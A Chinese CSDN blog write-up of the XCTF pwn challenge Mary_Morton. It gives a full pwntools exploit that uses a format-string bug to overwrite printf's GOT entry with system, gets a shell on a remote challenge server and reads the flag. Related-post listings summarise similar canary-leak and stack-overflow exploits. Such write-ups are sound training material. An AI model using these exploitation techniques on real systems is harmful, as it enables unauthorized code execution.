[XCTF-pwn] 1-Mary_Morton

于 2022-03-03 18:47:01 发布
阅读量160 收藏
点赞数
分类专栏: CTF pwn 文章标签: 安全 linux pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123261165
版权

太简的没意思,可以怕忘了到哪了,索性把exp按顺序存上。

这个题是个格式化字符串的题,没开pie,程序里有system。

直接把printf改为system就行了

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('111.200.241.244', 49641)

elf = ELF('./pwn')
context(arch='amd64', log_level='debug')

p.sendlineafter(b"3. Exit the battle \n", b'2')
p.sendline(fmtstr_payload(6,{elf.got['printf']: elf.sym['system']}))

p.sendlineafter(b"3. Exit the battle \n", b'2')
p.sendline(b'/bin/sh\x00')
sleep(0.2)
p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
专栏目录
pwn1(xctf)
weixin_43868725的博客
08-08 516
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
Mary_Morton(xctf)
weixin_43868725的博客
06-12 384
程序保护和流程 保护: 流程: main() 如果输入1会进入 这个函数有一个栈溢出漏洞。 如果输入2会进入 这个函数有一个格式化字符串漏洞。 还有一个cat_flag的函数 0x1 利用过程 首先这个程序开启了canary,所以直接栈溢出会报错。但是我们知道v2变量中存放的是canary值(v2在函数开始时就被**__readfsqword(0x28u)赋值,函数结束前与__readfsqword(0x28u)**进行比较),如果我们能通过格式化字符串漏洞将v2的值泄露出来就可以利用栈溢出漏洞
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1440
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
xctf高手进阶第二题 Mary_Morton
neuisf的博客
01-23 409
启动运行时输出提示有三个选项,分别是:1.缓冲区溢出漏洞;2.格式化字符串漏洞;3.退出。 解题方法:因为缓冲区溢出在main函数中,利用格式化字符串漏洞读取main函数的canary,利用缓冲区溢出运行0x4008DA处的system (/bin/cat flag)指令。 exp: from pwn import * p=remote('111.198.29.45'...
XCTF Mary_Morton
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-09 485
原题出现在ASIS-CTF-Finals-2017 程序存在两个漏洞,一个格式化字符串漏洞,一个栈溢出漏洞 通过格式化字符串漏洞泄露canary的值,然后再构造payload,利用栈溢出漏洞获取flag canary的值是v2,因此得到canary在栈中的位置为第17位(0x88 / 8=17),又因为程序为64位程序,64位程序函数调用前6个参数通过寄存器传递,所以要加6,因此格式化字符为%2...
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 645
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 362
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1648
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
XCTF-WEB-Web_php_include
Lorezon的博客
03-15 674
打开题目出现源码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> str函数对大小写敏感,考...
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 1917
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
xctf pwn1
qq_41071646的博客
05-14 989
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 337
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
Mary_Morton [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列17
重新启程
12-24 1605
题目地址:Mary_Morton 已经是高手进阶区的第六题了,每个题目都有不少收获,持之以恒! 先看看题目内容 很好,这是一道非常简单的热身pwn,当然,我是不会相信的!哈哈 大家应该注意到了,难度系数第一次>1星了,步入2星的阶段,最高是10星!期待一下 惯例先来检查安全机制 root@mypwn:/ctf/work/python/mary_morton# checksec ...
xctf-pwn-“stack2 & pwn1 & welpwn
njh18790816639的博客
07-30 194
stack2 首先探测一番,是32位,看下保护! ida静态分析一番! 还有个后门函数: 原先先要使用这个后门函数,但是发现远程服务器是没有bash的,所以这个后门函数是没有用的,误导我等! 不过还是先按正常思路来说,这第三个函数是没有检查数据的合法性的。 ...
2019.10.10攻防世界 Mary_Morton
DSR446的博客
10-10 325
根据索引rbp提供的信息,我们知道,canary位置距离rbp为0x8,而我们的输入参数距离rbp为0x90。且这是一个64位程序。我们可以计算canary的偏移 = 6(6个寄存器)+(0x90-0x8)/8 = 23 :这里子所以减0x8是减的rbp。 【注】:这个程序缺少符号表且没有开PIE,所以我们在下断点的到时候通过在ida中找相应的地址,不用加上程序的加载地址。 最后的 ...
mary_morton
pppp974的博客
07-22 1116
mary_morton 这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行栈溢出,后门题目已经给了。 来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输...
XCTF-攻防世界-pwn-新手村-level2
sifang_baweng的博客
04-11 556
XCTF-攻防世界-pwn-新手村-level2 XCTF-攻防世界-level0 题目链接: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5055&page=1 下载附件,拖进IDA, ...
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 639
题目描述: ASIS-CTF-Finals-2017 非常简单的热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
pure_color xctf
最新发布
07-16
### 回答1: pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值